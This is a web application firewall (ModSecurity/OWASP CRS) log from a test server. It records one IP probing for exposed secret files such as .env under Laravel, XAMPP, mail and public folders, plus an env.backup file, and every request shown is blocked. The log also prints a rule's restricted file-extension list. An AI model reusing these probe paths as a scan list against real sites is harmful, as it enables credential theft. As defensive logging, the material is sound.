[Wed Feb 18 18:16:12.317790 2026] [:error] [pid 2162821] [client 195.178.110.34:46252] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZXz3CIBqKqS85r3VthteQAAAAo"]
[Wed Feb 18 18:16:12.317952 2026] [:error] [pid 2162821] [client 195.178.110.34:46252] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZXz3CIBqKqS85r3VthteQAAAAo"]
[Wed Feb 18 18:16:18.783418 2026] [:error] [pid 2167592] [client 195.178.110.34:46254] [client 195.178.110.34] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZXz4rwAbj7ynvBbVCIkiwAAAAs"]
[Wed Feb 18 18:16:18.783720 2026] [:error] [pid 2167592] [client 195.178.110.34:46254] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZXz4rwAbj7ynvBbVCIkiwAAAAs"]
[Wed Feb 18 18:16:18.783913 2026] [:error] [pid 2167592] [client 195.178.110.34:46254] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZXz4rwAbj7ynvBbVCIkiwAAAAs"]
[Wed Feb 18 18:17:24.291407 2026] [:error] [pid 2161248] [client 195.178.110.34:50892] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aZX0JBUQWjA1_wshvbG-cQAAAAU"]
[Wed Feb 18 18:17:24.291658 2026] [:error] [pid 2161248] [client 195.178.110.34:50892] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aZX0JBUQWjA1_wshvbG-cQAAAAU"]
[Wed Feb 18 18:17:24.291850 2026] [:error] [pid 2161248] [client 195.178.110.34:50892] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aZX0JBUQWjA1_wshvbG-cQAAAAU"]
[Wed Feb 18 18:17:24.360017 2026] [:error] [pid 2161248] [client 195.178.110.34:50892] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aZX0JBUQWjA1_wshvbG-cgAAAAU"]
[Wed Feb 18 18:17:24.360253 2026] [:error] [pid 2161248] [client 195.178.110.34:50892] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aZX0JBUQWjA1_wshvbG-cgAAAAU"]
[Wed Feb 18 18:17:24.360445 2026] [:error] [pid 2161248] [client 195.178.110.34:50892] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aZX0JBUQWjA1_wshvbG-cgAAAAU"]
[Wed Feb 18 18:17:24.413364 2026] [:error] [pid 2161248] [client 195.178.110.34:50892] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aZX0JBUQWjA1_wshvbG-cwAAAAU"]
[Wed Feb 18 18:17:24.413621 2026] [:error] [pid 2161248] [client 195.178.110.34:50892] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aZX0JBUQWjA1_wshvbG-cwAAAAU"]
[Wed Feb 18 18:17:24.413824 2026] [:error] [pid 2161248] [client 195.178.110.34:50892] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aZX0JBUQWjA1_wshvbG-cwAAAAU"]
[Wed Feb 18 18:17:24.592991 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPOwAAAAM"]
[Wed Feb 18 18:17:24.593236 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPOwAAAAM"]
[Wed Feb 18 18:17:24.593417 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPOwAAAAM"]
[Wed Feb 18 18:17:24.689482 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPPAAAAAM"]
[Wed Feb 18 18:17:24.689715 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPPAAAAAM"]
[Wed Feb 18 18:17:24.689899 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPPAAAAAM"]
[Wed Feb 18 18:17:24.799299 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPPQAAAAM"]
[Wed Feb 18 18:17:24.799545 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPPQAAAAM"]
[Wed Feb 18 18:17:24.799742 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPPQAAAAM"]
[Wed Feb 18 18:17:24.881822 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPPgAAAAM"]
[Wed Feb 18 18:17:24.882046 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPPgAAAAM"]
[Wed Feb 18 18:17:24.882231 2026] [:error] [pid 2174667] [client 195.178.110.34:50908] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aZX0JGpX78ztQcRLRJcPPgAAAAM"]
[Wed Feb 18 18:17:26.227234 2026] [:error] [pid 2161192] [client 195.178.110.34:50920] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aZX0JlAwHIXdOR_IjqGnkgAAAAI"]
[Wed Feb 18 18:17:26.227481 2026] [:error] [pid 2161192] [client 195.178.110.34:50920] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aZX0JlAwHIXdOR_IjqGnkgAAAAI"]
[Wed Feb 18 18:17:26.227708 2026] [:error] [pid 2161192] [client 195.178.110.34:50920] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aZX0JlAwHIXdOR_IjqGnkgAAAAI"]
[Wed Feb 18 18:17:29.922112 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aZX0KUVZhN-wTu6C5d5nmQAAAAA"]
[Wed Feb 18 18:17:29.922428 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aZX0KUVZhN-wTu6C5d5nmQAAAAA"]
[Wed Feb 18 18:17:29.922622 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aZX0KUVZhN-wTu6C5d5nmQAAAAA"]
[Wed Feb 18 18:17:30.026203 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nmgAAAAA"]
[Wed Feb 18 18:17:30.026470 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nmgAAAAA"]
[Wed Feb 18 18:17:30.026653 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nmgAAAAA"]
[Wed Feb 18 18:17:30.114244 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nmwAAAAA"]
[Wed Feb 18 18:17:30.114515 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nmwAAAAA"]
[Wed Feb 18 18:17:30.114747 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nmwAAAAA"]
[Wed Feb 18 18:17:30.231376 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nnAAAAAA"]
[Wed Feb 18 18:17:30.231610 2026] [:error] [pid 2161190] [client 195.178.110.34:42238] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aZX0KkVZhN-wTu6C5d5nnAAAAAA"]
